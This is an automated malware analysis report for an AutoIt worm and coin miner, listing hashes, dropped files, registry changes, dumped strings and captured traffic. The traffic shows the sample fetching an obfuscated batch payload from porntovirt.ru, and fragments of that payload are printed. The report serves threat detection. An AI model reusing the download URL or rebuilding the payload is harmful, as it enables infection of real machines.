Worm.Win32.AutoItGen_641a95b805

by malwarelabrobot on July 28th, 2017 in Malware Descriptions.

Application.BitCoinMiner.QB (BitDefender), Trojan:Win32/Skeeyah.A!rfn (Microsoft), Trojan.Win32.Generic!BT (VIPRE), Trojan.Starter.7257 (DrWeb), Application.BitCoinMiner.QB (B) (Emsisoft), Artemis!641A95B80595 (McAfee), Trojan.Gen.2 (Symantec), Trojan.Win64.CoinMiner (Ikarus), Application.BitCoinMiner.QB (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 641a95b805951893259f5762ffb1894f
SHA1: c8fce7e3022e4ed8d09b5eaad92cdefafaa49312
SHA256: 83526226c2b4de1e327508d95eaedbf759df204b29e9934d734007044587c811
SSDeep: 49152:Sw80cTsjkWayN0MbyJBLY6rW/6tthk2UwZ0WGweuI9Ul:n8sjkZMbyJlY6rW/Ctu6A9U
Size: 2479104 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2017-07-06 16:27:46
Analyzed on: Windows7 SP1 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

No specific payload has been found.

Process activity

The Worm creates the following process(es):

%original file name%.exe:3408

The Worm injects its code into the following process(es):

WerFault.exe:3552

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3408 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Security.lnk (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut251C.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2618.tmp (5681 bytes)
C:\ProgramData\System32\1.bat (1372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut258A.tmp (2673 bytes)
C:\ProgramData\System32\system.exe (6441 bytes)
C:\ProgramData\System32\Security.exe (10161 bytes)

The Worm deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut251C.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2618.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut258A.tmp (0 bytes)

Registry activity

The process WerFault.exe:3552 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"ExceptionRecord" = "05 00 00 C0 00 00 00 00 00 00 00 00 35 2C 40 00"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug\UIHandles]
"FirstLevelConsentDialog" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\Windows Error Reporting\Debug\UIHandles]
"FirstLevelConsentDialog" = "Type: REG_QWORD, Length: 8"

Dropped PE files

MD5 File path
25232ae561624279185dc0a4845d3872 c:\ProgramData\System32\Security.exe
230d64ed8cea7a93c78605a5bb139c5e c:\ProgramData\System32\system.exe
25232ae561624279185dc0a4845d3872 c:\Users\All Users\System32\Security.exe
230d64ed8cea7a93c78605a5bb139c5e c:\Users\All Users\System32\system.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 3.3.14.2
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description: SoftPortal
Comments: http://www.autoitscript.com/autoit3/
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 580910 581120 4.62736 c2c2260508750422d20cd5cbb116b146
.rdata 585728 188686 188928 3.99304 4513b58651e3d8d87c81a396e5b2f1d1
.data 778240 36724 20992 0.830952 c2de4a3d214eae7e87c7bfc06bd79775
.rsrc 815104 1657647 1657856 5.5429 1f4dee3dc229c8e9e180de56738d6226
.reloc 2473984 28976 29184 4.70119 1254908a9a03d2bcf12045d49cd572b9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://porntovirt.ru/058/1.bat 88.212.240.244


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

HEAD /058/1.bat HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru


HTTP/1.1 200 OK
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Length: 28512
Date: Thu, 27 Jul 2017 07:23:29 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT..Content
-Type: application/x-msdownload..Content-Length: 28512..Date: Thu, 27 
Jul 2017 07:23:29 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connec
tion: Keep-Alive......


GET /058/1.bat HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=0-4553
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru


HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 0-4553/28512
Content-Length: 4554
Date: Thu, 27 Jul 2017 07:23:34 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
@echo off.set inxksqylqc=s.%inxksqylqc%et auuemxktqy=e.%inxksqylqc%%au
uemxktqy%t pdbjbjudfv=t.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% yvzkwzwux
l=a.goto XKOVYAUHOP.%igpjcpveos%%vgukpdvixh%%wmxgubnore% utknuebvbb=a.
:XKOVYAUHOP.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% uyjeoelvzv=b.goto WVE
QGCHUFY.%igpjcpveos%%ehavxusfes%%jqayaoxryo% uvjwretvnl=b.:WVEQGCHUFY.
%inxksqylqc%%auuemxktqy%%pdbjbjudfv% smhsogkpge=c.goto ABCFCYNASI.%igp
jcpveos%%zorihztnvb%%swobbgfwvy% gevhqspfku=c.:ABCFCYNASI.%inxksqylqc%
%auuemxktqy%%pdbjbjudfv% omitnjpjtp=d.goto ZIKHRYQHUS.%igpjcpveos%%pwt
hlirwdl%%mhoidmqlch% onrejkhrwe=d.:ZIKHRYQHUS.%inxksqylqc%%auuemxktqy%
%pdbjbjudfv% nwynvkcxky=e.goto LUELJNWYGA.%igpjcpveos%%lzdbcngxfv%%viu
tmdnijs% asuwpxsudo=e.:LUELJNWYGA.%inxksqylqc%%auuemxktqy%%pdbjbjudfv%
 rcwdqhicxi=f.goto LXDTGNOXSL.%igpjcpveos%%jobqdofsme%%qplgwioqbb% jxi
zqpayay=f.:LXDTGNOXSL.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% qjeeghljzr=
g.goto XFPEEBKIPU.%igpjcpveos%%fncqcsklyp%%gxnfarmzil% wyeydcausi=g.:X
FPEEBKIPU.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% vltbidfhwc=h.goto YEGTJ
ARAMF.%igpjcpveos%%eyslktxzqy%Ëxzrwbzkv% mkoqamikor=h.:YEGTJARAMF.%i
nxksqylqc%%auuemxktqy%%pdbjbjudfv% cyxruwjaxl=i.goto RTPTEGNWIO.%igpjc
pveos%%ieqbfpdfci%%tfqfdeobbf% hrfekrjsgb=i.:RTPTEGNWIO.%inxksqylqc%%a
uuemxktqy%%pdbjbjudfv% ohjctjfkuu=j.goto AYCXFYVAFY.%igpjcpveos%%ikycv
qgler%%xoworbfodo% yzhdpahbnk=j.:AYCXFYVAFY.%inxksqylqc%%auuemxktqy%%p
dbjbjudfv% pfaryjmcrf=k.goto NZYWSKVWXI.%igpjcpveos%%mmnzxmakbc%%vzmjz
csbvx% tcrxgewcpv=k.:NZYWSKVWXI.%inxksqylqc%%auuemxktqy%%pdbjbjudf
<<< skipped >>>

GET /058/1.bat HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=4554-8949
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru


HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 4554-8949/28512
Content-Length: 4396
Date: Thu, 27 Jul 2017 07:23:36 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
=h.goto YEGTJARAMF.%igpjcpveos%%eyslktxzqy%Ëxzrwbzkv% mkoqamikor=h.:
YEGTJARAMF.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% cyxruwjaxl=i.goto RTPT
EGNWIO.%igpjcpveos%%ieqbfpdfci%%tfqfdeobbf% hrfekrjsgb=i.:RTPTEGNWIO.%
inxksqylqc%%auuemxktqy%%pdbjbjudfv% ohjctjfkuu=j.goto AYCXFYVAFY.%igpj
cpveos%%ikycvqgler%%xoworbfodo% yzhdpahbnk=j.:AYCXFYVAFY.%inxksqylqc%%
auuemxktqy%%pdbjbjudfv% pfaryjmcrf=k.goto NZYWSKVWXI.%igpjcpveos%%mmnz
xmakbc%%vzmjzcsbvx% tcrxgewcpv=k.:NZYWSKVWXI.%inxksqylqc%%auuemxktqy%%
pdbjbjudfv% jujrtpiyon=l.goto DLIOPUDMTR.%igpjcpveos%%tzrpjeecck%%zfkz
uyyhhh% kgkdsnjehf=l.:DLIOPUDMTR.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% 
rawvthqdkx=m.goto YSZBZZEULB.%igpjcpveos%%yxzstzotkw%%zmsakzbojr% oqqm
gkaqio=m.:YSZBZZEULB.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% easthtpzci=n
.goto PABBEJCDSK.%igpjcpveos%%ghvpmshfwf%%dnhwmuvmgc% magholneax=n.:PA
BBEJCDSK.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% umcmedypzr=o.goto KDLVVN
REUV.%igpjcpveos%%tlyhtfridp%%kblnynzeik% qgewjhtjmh=o.:KDLVVNREUV.%in
xksqylqc%%auuemxktqy%%pdbjbjudfv% ptuzoizxqb=p.goto CHFBHWEGMF.%igpjcp
veos%%bqmktxzmaz%%pztqiijwpv% qnmyziwqor=p.:CHFBHWEGMF.%inxksqylqc%%au
uemxktqy%%pdbjbjudfv% zrrqezlnim=q.goto FRKKVTUSOO.%igpjcpveos%%vcmrwc
kbhi%%xipnbachbf% upbubdqolb=q.:FRKKVTUSOO.%inxksqylqc%%auuemxktqy%%pd
bjbjudfv% bfftkwmgzu=r.goto XRWWOBXNQZ.%igpjcpveos%%lnwktmtrer%%kmseio
mkip% urbcydioxm=r.:XRWWOBXNQZ.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% tj
zzwfzirf=s.goto BXUMJXCTCJ.%igpjcpveos%%zkjpoyiggc%%ssgiifupfz% hannxr
eyuv=s.:BXUMJXCTCJ.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% wsehjcpvto
<<< skipped >>>

GET /058/1.bat HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=8950-13674
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru


HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 8950-13674/28512
Content-Length: 4725
Date: Thu, 27 Jul 2017 07:23:37 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
judfv% umcmedypzr=o.goto KDLVVNREUV.%igpjcpveos%%tlyhtfridp%%kblnynzei
k% qgewjhtjmh=o.:KDLVVNREUV.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% ptuzo
izxqb=p.goto CHFBHWEGMF.%igpjcpveos%%bqmktxzmaz%%pztqiijwpv% qnmyziwqo
r=p.:CHFBHWEGMF.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% zrrqezlnim=q.goto
 FRKKVTUSOO.%igpjcpveos%%vcmrwckbhi%%xipnbachbf% upbubdqolb=q.:FRKKVTU
SOO.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% bfftkwmgzu=r.goto XRWWOBXNQZ.
%igpjcpveos%%lnwktmtrer%%kmseiomkip% urbcydioxm=r.:XRWWOBXNQZ.%inxksqy
lqc%%auuemxktqy%%pdbjbjudfv% tjzzwfzirf=s.goto BXUMJXCTCJ.%igpjcpveos%
%zkjpoyiggc%%ssgiifupfz% hannxreyuv=s.:BXUMJXCTCJ.%inxksqylqc%%auuemxk
tqy%%pdbjbjudfv% wsehjcpvto=t.goto AEBNZYFZES.%igpjcpveos%%qslosigpnm%
%ndgpllfdmi% ojjkqjxjge=t.:AEBNZYFZES.%inxksqylqc%%auuemxktqy%%pdbjbju
dfv% osqudksqvz=u.goto LQVSQMLRQB.%igpjcpveos%%tgzqzfhjeu%%welztccbus%
 bomcwxhnoo=u.:LQVSQMLRQB.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% syokygx
vhi=v.goto MTVANMDQDL.%igpjcpveos%%kktwloulwe%%rldndhdilc% jtagxoprky=
v.:MTVANMDQDL.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% rfvlnhacjs=w.goto Y
BHLMAZAZV.%igpjcpveos%%nuzfylkxyn%%htfmhrbrsl% eeanauagrh=w.:YBHLMAZAZ
V.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% drpqfvgtvb=x.goto FLDIFSSMME.%i
gpjcpveos%%fuksstnsay%%khtoooclku% ngfxilxdzs=x.:FLDIFSSMME.%inxksqylq
c%%auuemxktqy%%pdbjbjudfv% dupycvytil=y.goto SPGALFCPTO.%igpjcpveos%%j
aihnpsymi%%blnuzxpnbe% inxksqylqc=y.:SPGALFCPTO.%inxksqylqc%%auuemxktq
y%%pdbjbjudfv% pdbjbjudfv=z.goto AUUEMXKTQY.%igpjcpveos%%igpjcpveos%%x
kovyauhop% yvzkwzwuxl=z.:AUUEMXKTQY.@echo on.@%nwynvkcxky%%smhsogk
<<< skipped >>>

GET /058/1.bat HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=13675-24390
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru


HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 13675-24390/28512
Content-Length: 10716
Date: Thu, 27 Jul 2017 07:23:38 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
say%%khtoooclku% ngfxilxdzs=x.:FLDIFSSMME.%inxksqylqc%%auuemxktqy%%pdb
jbjudfv% dupycvytil=y.goto SPGALFCPTO.%igpjcpveos%%jaihnpsymi%%blnuzxp
nbe% inxksqylqc=y.:SPGALFCPTO.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% pdb
jbjudfv=z.goto AUUEMXKTQY.%igpjcpveos%%igpjcpveos%%xkovyauhop% yvzkwzw
uxl=z.:AUUEMXKTQY.@echo on.@%nwynvkcxky%%smhsogkpge%%vltbidfhwc%%umcme
dypzr% %umcmedypzr%%rcwdqhicxi%%rcwdqhicxi%@echo off.set inxksqylqc=s.
%inxksqylqc%et auuemxktqy=e.%inxksqylqc%%auuemxktqy%t pdbjbjudfv=t.%in
xksqylqc%%auuemxktqy%%pdbjbjudfv% yvzkwzwuxl=a.goto XKOVYAUHOP.%igpjcp
veos%%vgukpdvixh%%wmxgubnore% utknuebvbb=a.:XKOVYAUHOP.%inxksqylqc%%au
uemxktqy%%pdbjbjudfv% uyjeoelvzv=b.goto WVEQGCHUFY.%igpjcpveos%%ehavxu
sfes%%jqayaoxryo% uvjwretvnl=b.:WVEQGCHUFY.%inxksqylqc%%auuemxktqy%%pd
bjbjudfv% smhsogkpge=c.goto ABCFCYNASI.%igpjcpveos%%zorihztnvb%%swobbg
fwvy% gevhqspfku=c.:ABCFCYNASI.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% om
itnjpjtp=d.goto ZIKHRYQHUS.%igpjcpveos%%pwthlirwdl%%mhoidmqlch% onrejk
hrwe=d.:ZIKHRYQHUS.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% nwynvkcxky=e.g
oto LUELJNWYGA.%igpjcpveos%%lzdbcngxfv%%viutmdnijs% asuwpxsudo=e.:LUEL
JNWYGA.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% rcwdqhicxi=f.goto LXDTGNOX
SL.%igpjcpveos%%jobqdofsme%%qplgwioqbb% jxizqpayay=f.:LXDTGNOXSL.%inxk
sqylqc%%auuemxktqy%%pdbjbjudfv% qjeeghljzr=g.goto XFPEEBKIPU.%igpjcpve
os%%fncqcsklyp%%gxnfarmzil% wyeydcausi=g.:XFPEEBKIPU.%inxksqylqc%%auue
mxktqy%%pdbjbjudfv% vltbidfhwc=h.goto YEGTJARAMF.%igpjcpveos%%eyslktxz
qy%Ëxzrwbzkv% mkoqamikor=h.:YEGTJARAMF.%inxksqylqc%%auuemxktqy%%
<<< skipped >>>

GET /058/1.bat HTTP/1.1


Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 06 Jul 2017 13:26:51 GMT
Range: bytes=24391-28511
User-Agent: Microsoft BITS/7.5
Host: porntovirt.ru


HTTP/1.1 206 Partial Content
Last-Modified: Thu, 06 Jul 2017 13:26:51 GMT
Content-Type: application/x-msdownload
Content-Range: bytes 24391-28511/28512
Content-Length: 4121
Date: Thu, 27 Jul 2017 07:23:39 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
xksqylqc%%auuemxktqy%%pdbjbjudfv% rfvlnhacjs=w.goto YBHLMAZAZV.%igpjcp
veos%%nuzfylkxyn%%htfmhrbrsl% eeanauagrh=w.:YBHLMAZAZV.%inxksqylqc%%au
uemxktqy%%pdbjbjudfv% drpqfvgtvb=x.goto FLDIFSSMME.%igpjcpveos%%fuksst
nsay%%khtoooclku% ngfxilxdzs=x.:FLDIFSSMME.%inxksqylqc%%auuemxktqy%%pd
bjbjudfv% dupycvytil=y.goto SPGALFCPTO.%igpjcpveos%%jaihnpsymi%%blnuzx
pnbe% inxksqylqc=y.:SPGALFCPTO.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% pd
bjbjudfv=z.goto AUUEMXKTQY.%igpjcpveos%%igpjcpveos%%xkovyauhop% yvzkwz
wuxl=z.:AUUEMXKTQY.@echo on.@%nwynvkcxky%%smhsogkpge%%vltbidfhwc%%umcm
edypzr% %umcmedypzr%%rcwdqhicxi%%rcwdqhicxi%@echo off.set inxksqylqc=s
.%inxksqylqc%et auuemxktqy=e.%inxksqylqc%%auuemxktqy%t pdbjbjudfv=t.%i
nxksqylqc%%auuemxktqy%%pdbjbjudfv% yvzkwzwuxl=a.goto XKOVYAUHOP.%igpjc
pveos%%vgukpdvixh%%wmxgubnore% utknuebvbb=a.:XKOVYAUHOP.%inxksqylqc%%a
uuemxktqy%%pdbjbjudfv% uyjeoelvzv=b.goto WVEQGCHUFY.%igpjcpveos%%ehavx
usfes%%jqayaoxryo% uvjwretvnl=b.:WVEQGCHUFY.%inxksqylqc%%auuemxktqy%%p
dbjbjudfv% smhsogkpge=c.goto ABCFCYNASI.%igpjcpveos%%zorihztnvb%%swobb
gfwvy% gevhqspfku=c.:ABCFCYNASI.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% o
mitnjpjtp=d.goto ZIKHRYQHUS.%igpjcpveos%%pwthlirwdl%%mhoidmqlch% onrej
khrwe=d.:ZIKHRYQHUS.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% nwynvkcxky=e.
goto LUELJNWYGA.%igpjcpveos%%lzdbcngxfv%%viutmdnijs% asuwpxsudo=e.:LUE
LJNWYGA.%inxksqylqc%%auuemxktqy%%pdbjbjudfv% rcwdqhicxi=f.goto LXDTGNO
XSL.%igpjcpveos%%jobqdofsme%%qplgwioqbb% jxizqpayay=f.:LXDTGNOXSL.%inx
ksqylqc%%auuemxktqy%%pdbjbjudfv% qjeeghljzr=g.goto XFPEEBKIPU.%igp
<<< skipped >>>

The Worm connects to the servers at the folowing location(s):

Security.exe_3524:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
r%f;M
j.Xf;
j.Zf;
PSSSSSSh
Gt.Ht$
.ku`8iu~fiu
kernel32.dll
?#%X.y
GetProcessWindowStation
operator
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
WSOCK32.dll
VERSION.dll
WINMM.dll
COMCTL32.dll
MPR.dll
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
USERENV.dll
UxTheme.dll
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
KERNEL32.dll
OpenWindowStationW
SetProcessWindowStation
CloseWindowStation
MapVirtualKeyW
EnumChildWindows
EnumWindows
VkKeyScanW
GetKeyState
GetKeyboardState
SetKeyboardState
GetAsyncKeyState
keybd_event
EnumThreadWindows
ExitWindowsEx
UnregisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
zcÁ
n..GGHHH
n...GGHHH
n ....HGHHHH
n  ....G.HHH
~~~~{~{{{{
n!! ....HGHHHH
n!!  .....HHHHHH
!!!  ....GGHHH
!!"".....HHHHnv
"""...-.nv
.Gm,6:
Af%D/v
5f.Tf
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
;$;*;0;6;<;|;
=#=(=-=2=7===
3.44484<4@4
3&323^3|3
9 9$9(9,9?9
?#?'? ?/?3?7?;???
4"4&4*4.424
7)868=8=:
= =$=(=,=0=4=8=
0 0$0(0,00040
3"3(313]3
1!1%1)1-1115191=1
< <*<4<{<
<$=4=8=<=
3 3(30383@3
/AutoIt3ExecuteScript
/AutoIt3ExecuteLine
CMDLINE
CMDLINERAW
>>>AUTOIT NO CMDEXECUTE<<<
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MAPKEYS
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDownDelay
SendKeyDelay
TCPTimeout
mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
789:;<=>?
APPSKEY
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
KEYS
\\?\UNC\
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 14, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
C:\ProgramData\System32\Security.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
10.9.14393.0
Windows Driver Host
3.3.14.2

conhost.exe_3804:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
